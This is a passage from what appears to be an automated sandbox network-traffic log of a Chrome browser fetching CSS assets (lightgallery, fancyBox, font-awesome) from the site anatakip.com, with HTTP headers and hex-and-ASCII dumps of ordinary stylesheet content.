                    2024-05-26 22:57:32 UTC1369INData Raw: 63 6f 6e 2d 62 72 69 65 66 63 61 73 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 33 39 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 75 6c 6c 73 63 72 65 65 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 30 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 64 61 73 68 62 6f 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 61 70 65 72 63 6c 69 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 32 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 68 65 61 72 74 2d 65 6d 70 74 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6c 69 6e 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 34 22 7d
                    Data Ascii: con-briefcase:before{content:"\e139"}.glyphicon-fullscreen:before{content:"\e140"}.glyphicon-dashboard:before{content:"\e141"}.glyphicon-paperclip:before{content:"\e142"}.glyphicon-heart-empty:before{content:"\e143"}.glyphicon-link:before{content:"\e144"}
                    2024-05-26 22:57:32 UTC1369INData Raw: 6e 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6c 6f 70 70 79 2d 64 69 73 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 32 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6c 6f 70 70 79 2d 73 61 76 65 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6c 6f 70 70 79 2d 72 65 6d 6f 76 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6c 6f 70 70 79 2d 73 61 76 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6c 6f 70 70 79 2d 6f 70 65 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31
                    Data Ascii: nd:before{content:"\e171"}.glyphicon-floppy-disk:before{content:"\e172"}.glyphicon-floppy-saved:before{content:"\e173"}.glyphicon-floppy-remove:before{content:"\e174"}.glyphicon-floppy-save:before{content:"\e175"}.glyphicon-floppy-open:before{content:"\e1


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.549716104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:32 UTC647OUTGET /assets/lightgallery/dist/css/lightgallery.min.css HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: text/css,*/*;q=0.1
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: style
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
                    2024-05-26 22:57:32 UTC765INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:32 GMT
                    Content-Type: text/css
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: public, max-age=2592000
                    expires: Mon, 17 Jun 2024 14:40:28 GMT
                    last-modified: Tue, 30 Apr 2024 19:23:27 GMT
                    vary: Accept-Encoding,Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: HIT
                    Age: 721024
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3B8e%2FCi4ouaVZod8VtOpF%2B4n4VTnGkyRgMK59keaX5N6A%2Bsx%2B4vEX8Cx6Ch8JdCo9h8x4lcQZU7Ro0%2BgRdRtlhGWkyGJbSczp2FZIdWTAn7w4Pesv4uTm7xA%2BcrFuXk%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15d624e1f42c8-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:32 UTC604INData Raw: 34 32 66 35 0d 0a 2e 6c 67 2d 73 75 62 2d 68 74 6d 6c 2c 2e 6c 67 2d 74 6f 6f 6c 62 61 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 34 35 29 7d 23 6c 67 2d 63 6f 75 6e 74 65 72 2c 2e 6c 67 2d 6f 75 74 65 72 20 2e 6c 67 2d 76 69 64 65 6f 2d 63 6f 6e 74 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6c 67 3b 73 72 63 3a 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 6c 67 2e 65 6f 74 3f 6e 31 7a 33 37 33 29 3b 73 72 63 3a 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 6c 67 2e 65 6f 74 3f 23 69 65 66 69 78 6e 31 7a 33 37 33 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64 65
                    Data Ascii: 42f5.lg-sub-html,.lg-toolbar{background-color:rgba(0,0,0,.45)}#lg-counter,.lg-outer .lg-video-cont{vertical-align:middle;display:inline-block}@font-face{font-family:lg;src:url(../fonts/lg.eot?n1z373);src:url(../fonts/lg.eot?#iefixn1z373) format("embedde
                    2024-05-26 22:57:32 UTC1369INData Raw: 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 7d 2e 6c 67 2d 61 63 74 69 6f 6e 73 20 2e 6c 67 2d 6e 65 78 74 2c 2e 6c 67 2d 61 63 74 69 6f 6e 73 20 2e 6c 67 2d 70 72 65 76 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 34 35 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 3b 63 6f 6c 6f 72 3a 23 39 39 39 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 70 78 3b 70 61 64 64 69 6e 67 3a 38 70 78 20 31 30 70 78 20 39 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 35 30 25 3b 7a 2d 69 6e 64 65 78 3a 31 30 38 30 7d 2e 6c 67 2d
                    Data Ascii: -font-smoothing:grayscale}.lg-actions .lg-next,.lg-actions .lg-prev{background-color:rgba(0,0,0,.45);border-radius:2px;color:#999;cursor:pointer;display:block;font-size:22px;margin-top:-10px;padding:8px 10px 9px;position:absolute;top:50%;z-index:1080}.lg-
                    2024-05-26 22:57:32 UTC1369INData Raw: 31 30 30 25 7d 2e 6c 67 2d 74 6f 6f 6c 62 61 72 20 2e 6c 67 2d 69 63 6f 6e 7b 63 6f 6c 6f 72 3a 23 39 39 39 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 68 65 69 67 68 74 3a 34 37 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 77 69 64 74 68 3a 35 30 70 78 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 6f 75 74 6c 69 6e 65 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 32 73 20 6c 69 6e 65 61 72 3b 2d 6f 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 32 73 20 6c 69
                    Data Ascii: 100%}.lg-toolbar .lg-icon{color:#999;cursor:pointer;float:right;font-size:24px;height:47px;line-height:27px;padding:10px 0;text-align:center;width:50px;text-decoration:none!important;outline:0;-webkit-transition:color .2s linear;-o-transition:color .2s li
                    2024-05-26 22:57:32 UTC1369INData Raw: 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 31 30 70 78 2c 30 2c 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 31 30 70 78 2c 30 2c 30 29 7d 2e 6c 67 2d 68 69 64 65 2d 69 74 65 6d 73 20 2e 6c 67 2d 74 6f 6f 6c 62 61 72 7b 6f 70 61 63 69 74 79 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 2d 31 30 70 78 2c 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 2d 31 30 70 78 2c 30 29 7d 62 6f 64 79 3a 6e 6f 74 28 2e 6c 67 2d 66 72 6f 6d 2d 68 61 73 68 29 20 2e 6c 67 2d 6f 75 74 65 72 2e 6c 67 2d 73 74 61 72 74 2d 7a 6f 6f 6d 20 2e 6c 67 2d 6f 62 6a 65 63 74 7b 2d 77 65 62 6b 69 74 2d 74 72
                    Data Ascii: :0;-webkit-transform:translate3d(10px,0,0);transform:translate3d(10px,0,0)}.lg-hide-items .lg-toolbar{opacity:0;-webkit-transform:translate3d(0,-10px,0);transform:translate3d(0,-10px,0)}body:not(.lg-from-hash) .lg-outer.lg-start-zoom .lg-object{-webkit-tr
                    2024-05-26 22:57:32 UTC1369INData Raw: 66 6f 72 6d 20 2e 32 35 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 30 2c 2e 32 35 2c 31 29 20 30 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 74 72 61 6e 73 66 6f 72 6d 20 2e 32 35 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 30 2c 2e 32 35 2c 31 29 20 30 73 7d 2e 6c 67 2d 6f 75 74 65 72 20 2e 6c 67 2d 74 68 75 6d 62 2d 6f 75 74 65 72 2e 6c 67 2d 67 72 61 62 20 2e 6c 67 2d 74 68 75 6d 62 2d 69 74 65 6d 7b 63 75 72 73 6f 72 3a 2d 77 65 62 6b 69 74 2d 67 72 61 62 3b 63 75 72 73 6f 72 3a 2d 6d 6f 7a 2d 67 72 61 62 3b 63 75 72 73 6f 72 3a 2d 6f 2d 67 72 61 62 3b 63 75 72 73 6f 72 3a 2d 6d 73 2d 67 72 61 62 3b 63 75 72 73 6f 72 3a 67 72 61 62 7d 2e 6c 67 2d 6f 75 74 65 72 20 2e 6c 67 2d 74 68 75 6d 62 2d 6f 75 74 65 72 2e 6c 67 2d 67 72 61 62 62 69 6e
                    Data Ascii: form .25s cubic-bezier(0,0,.25,1) 0s;transition:transform .25s cubic-bezier(0,0,.25,1) 0s}.lg-outer .lg-thumb-outer.lg-grab .lg-thumb-item{cursor:-webkit-grab;cursor:-moz-grab;cursor:-o-grab;cursor:-ms-grab;cursor:grab}.lg-outer .lg-thumb-outer.lg-grabbin
                    2024-05-26 22:57:32 UTC1369INData Raw: 61 73 65 7d 2e 6c 67 2d 6f 75 74 65 72 2e 6c 67 2d 70 75 6c 6c 2d 63 61 70 74 69 6f 6e 2d 75 70 2e 6c 67 2d 74 68 75 6d 62 2d 6f 70 65 6e 20 2e 6c 67 2d 73 75 62 2d 68 74 6d 6c 7b 62 6f 74 74 6f 6d 3a 31 30 30 70 78 7d 2e 6c 67 2d 6f 75 74 65 72 20 2e 6c 67 2d 74 6f 6f 67 6c 65 2d 74 68 75 6d 62 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 44 30 41 30 41 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 20 32 70 78 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 39 39 39 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 68 65 69 67 68 74 3a 33 39 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 3b 70 61 64 64 69 6e 67 3a 35 70 78 20 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69
                    Data Ascii: ase}.lg-outer.lg-pull-caption-up.lg-thumb-open .lg-sub-html{bottom:100px}.lg-outer .lg-toogle-thumb{background-color:#0D0A0A;border-radius:2px 2px 0 0;color:#999;cursor:pointer;font-size:24px;height:39px;line-height:27px;padding:5px 0;position:absolute;ri
                    2024-05-26 22:57:32 UTC1369INData Raw: 75 62 65 3a 68 6f 76 65 72 20 2e 6c 67 2d 76 69 64 65 6f 2d 70 6c 61 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2e 2e 2f 69 6d 67 2f 79 6f 75 74 75 62 65 2d 70 6c 61 79 2e 70 6e 67 29 20 30 20 2d 36 30 70 78 20 6e 6f 2d 72 65 70 65 61 74 7d 2e 6c 67 2d 6f 75 74 65 72 20 2e 6c 67 2d 76 69 64 65 6f 2d 6f 62 6a 65 63 74 7b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 68 65 69 67 68 74 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 7d 2e 6c 67 2d 6f 75 74 65 72 20 2e 6c 67 2d 68 61 73 2d 76 69 64 65 6f 20 2e 6c 67 2d 76 69 64 65 6f 2d 6f 62 6a 65 63 74 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 6c 67 2d 6f 75 74 65 72 20 2e 6c
                    Data Ascii: ube:hover .lg-video-play{background:url(../img/youtube-play.png) 0 -60px no-repeat}.lg-outer .lg-video-object{width:100%!important;height:100%!important;position:absolute;top:0;left:0}.lg-outer .lg-has-video .lg-video-object{visibility:hidden}.lg-outer .l
                    2024-05-26 22:57:32 UTC1369INData Raw: 2c 30 2c 2e 32 35 2c 31 29 20 30 73 2c 74 6f 70 20 2e 33 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 30 2c 2e 32 35 2c 31 29 20 30 73 3b 2d 6f 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 6c 65 66 74 20 2e 33 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 30 2c 2e 32 35 2c 31 29 20 30 73 2c 74 6f 70 20 2e 33 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 30 2c 2e 32 35 2c 31 29 20 30 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6c 65 66 74 20 2e 33 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 30 2c 2e 32 35 2c 31 29 20 30 73 2c 74 6f 70 20 2e 33 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 30 2c 2e 32 35 2c 31 29 20 30 73 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 3b 74 72 61
                    Data Ascii: ,0,.25,1) 0s,top .3s cubic-bezier(0,0,.25,1) 0s;-o-transition:left .3s cubic-bezier(0,0,.25,1) 0s,top .3s cubic-bezier(0,0,.25,1) 0s;transition:left .3s cubic-bezier(0,0,.25,1) 0s,top .3s cubic-bezier(0,0,.25,1) 0s;-webkit-transform:translate3d(0,0,0);tra
                    2024-05-26 22:57:32 UTC1369INData Raw: 74 65 72 20 2e 6c 67 2d 70 61 67 65 72 2d 6f 75 74 65 72 2e 6c 67 2d 70 61 67 65 72 2d 68 6f 76 65 72 20 2e 6c 67 2d 70 61 67 65 72 2d 63 6f 6e 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 2e 6c 67 2d 6f 75 74 65 72 20 2e 6c 67 2d 70 61 67 65 72 2d 63 6f 6e 74 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 6d 61 72 67 69 6e 3a 30 20 35 70 78 7d 2e 6c 67 2d 6f 75 74 65 72 20 2e 6c 67 2d 70 61 67 65 72 2d 63 6f 6e 74 3a 68 6f 76 65 72 20 2e 6c 67 2d 70 61 67 65 72 2d 74 68 75 6d 62 2d 63 6f 6e 74 7b 6f 70 61 63 69 74 79 3a 31
                    Data Ascii: ter .lg-pager-outer.lg-pager-hover .lg-pager-cont{overflow:visible}.lg-outer .lg-pager-cont{cursor:pointer;display:inline-block;overflow:hidden;position:relative;vertical-align:top;margin:0 5px}.lg-outer .lg-pager-cont:hover .lg-pager-thumb-cont{opacity:1
                    2024-05-26 22:57:32 UTC1369INData Raw: 65 72 2d 6c 65 66 74 3a 31 30 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 31 30 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 30 70 78 20 64 61 73 68 65 64 3b 62 6f 74 74 6f 6d 3a 2d 31 30 70 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 30 3b 6c 65 66 74 3a 35 30 25 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 77 69 64 74 68 3a 30 7d 2e 6c 67 2d 6f 75 74 65 72 2c 2e 6c 67 2d 6f 75 74 65 72 20 2e 6c 67 2c 2e 6c 67 2d 6f 75 74 65 72 20 2e 6c 67 2d 69 6e 6e 65 72 7b 77 69 64 74
                    Data Ascii: er-left:10px solid transparent;border-right:10px solid transparent;border-top:10px dashed;bottom:-10px;display:inline-block;height:0;left:50%;margin-left:-5px;position:absolute;vertical-align:middle;width:0}.lg-outer,.lg-outer .lg,.lg-outer .lg-inner{widt


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.549717104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:32 UTC656OUTGET /assets/scripts/fancybox/source/jquery.fancybox.css?v=2.1.5 HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: text/css,*/*;q=0.1
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: style
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
                    2024-05-26 22:57:32 UTC821INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:32 GMT
                    Content-Type: text/css
                    Content-Length: 3879
                    Connection: close
                    Cf-Bgj: minify
                    Cf-Polished: origSize=5168
                    cache-control: public, max-age=2592000
                    expires: Sat, 22 Jun 2024 17:24:41 GMT
                    last-modified: Tue, 30 Apr 2024 19:23:27 GMT
                    vary: Accept-Encoding,Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: HIT
                    Age: 279171
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HlPfNWeyQRjx%2BdrsoRvW2xGebP5%2FlMaz00PUeujYpEiRsYKOrK9gf20Ray0ju6eCtV9hLmPA3%2Bf2rTYokRm8xUFkBlYEx6qMZn70X0%2Fkmp7HgHg3Og1tCaMv8qRHAAU%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15d6258580fa4-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:32 UTC548INData Raw: 2f 2a 21 66 61 6e 63 79 42 6f 78 20 76 32 2e 31 2e 35 20 66 61 6e 63 79 61 70 70 73 2e 63 6f 6d 20 7c 20 66 61 6e 63 79 61 70 70 73 2e 63 6f 6d 2f 66 61 6e 63 79 62 6f 78 2f 23 6c 69 63 65 6e 73 65 2a 2f 2e 66 61 6e 63 79 62 6f 78 2d 77 72 61 70 2c 2e 66 61 6e 63 79 62 6f 78 2d 73 6b 69 6e 2c 2e 66 61 6e 63 79 62 6f 78 2d 6f 75 74 65 72 2c 2e 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 2c 2e 66 61 6e 63 79 62 6f 78 2d 69 6d 61 67 65 2c 2e 66 61 6e 63 79 62 6f 78 2d 77 72 61 70 20 69 66 72 61 6d 65 2c 2e 66 61 6e 63 79 62 6f 78 2d 77 72 61 70 20 6f 62 6a 65 63 74 2c 2e 66 61 6e 63 79 62 6f 78 2d 6e 61 76 2c 2e 66 61 6e 63 79 62 6f 78 2d 6e 61 76 20 73 70 61 6e 2c 2e 66 61 6e 63 79 62 6f 78 2d 74 6d 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30
                    Data Ascii: /*!fancyBox v2.1.5 fancyapps.com | fancyapps.com/fancybox/#license*/.fancybox-wrap,.fancybox-skin,.fancybox-outer,.fancybox-inner,.fancybox-image,.fancybox-wrap iframe,.fancybox-wrap object,.fancybox-nav,.fancybox-nav span,.fancybox-tmp{padding:0;margin:0
                    2024-05-26 22:57:32 UTC1369INData Raw: 64 20 2e 66 61 6e 63 79 62 6f 78 2d 73 6b 69 6e 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 30 70 78 20 32 35 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 35 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 30 70 78 20 32 35 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 30 70 78 20 32 35 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 35 29 7d 2e 66 61 6e 63 79 62 6f 78 2d 6f 75 74 65 72 2c 2e 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 66 61 6e 63 79 62 6f 78 2d 74 79 70 65 2d 69 66 72 61 6d 65 20 2e 66 61 6e 63 79 62
                    Data Ascii: d .fancybox-skin{-webkit-box-shadow:0 10px 25px rgba(0,0,0,.5);-moz-box-shadow:0 10px 25px rgba(0,0,0,.5);box-shadow:0 10px 25px rgba(0,0,0,.5)}.fancybox-outer,.fancybox-inner{position:relative}.fancybox-inner{overflow:hidden}.fancybox-type-iframe .fancyb
                    2024-05-26 22:57:32 UTC1369INData Raw: 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 66 61 6e 63 79 62 6f 78 2d 70 72 65 76 20 73 70 61 6e 7b 6c 65 66 74 3a 31 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 33 36 70 78 7d 2e 66 61 6e 63 79 62 6f 78 2d 6e 65 78 74 20 73 70 61 6e 7b 72 69 67 68 74 3a 31 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 37 32 70 78 7d 2e 66 61 6e 63 79 62 6f 78 2d 6e 61 76 3a 68 6f 76 65 72 20 73 70 61 6e 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 2e 66 61 6e 63 79 62 6f 78 2d 74 6d 70 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 39 39 39 39 39 70 78 3b 6c 65 66 74 3a 2d 39 39 39 39 39 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b
                    Data Ascii: isibility:hidden}.fancybox-prev span{left:10px;background-position:0 -36px}.fancybox-next span{right:10px;background-position:0 -72px}.fancybox-nav:hover span{visibility:visible}.fancybox-tmp{position:absolute;top:-99999px;left:-99999px;visibility:hidden;
                    2024-05-26 22:57:32 UTC593INData Raw: 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 66 61 6e 63 79 62 6f 78 2d 74 69 74 6c 65 2d 69 6e 73 69 64 65 2d 77 72 61 70 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 7d 2e 66 61 6e 63 79 62 6f 78 2d 74 69 74 6c 65 2d 6f 76 65 72 2d 77 72 61 70 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 30 30 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 38 29 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 31 2e 35
                    Data Ascii: argin-top:10px;color:#fff}.fancybox-title-inside-wrap{padding-top:10px}.fancybox-title-over-wrap{position:absolute;bottom:0;left:0;color:#fff;padding:10px;background:#000;background:rgba(0,0,0,.8)}@media only screen and (-webkit-min-device-pixel-ratio:1.5


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.549721104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:32 UTC631OUTGET /assets/style/font-awesome.min.css HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: text/css,*/*;q=0.1
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: style
                    Referer: https://anatakip.com/
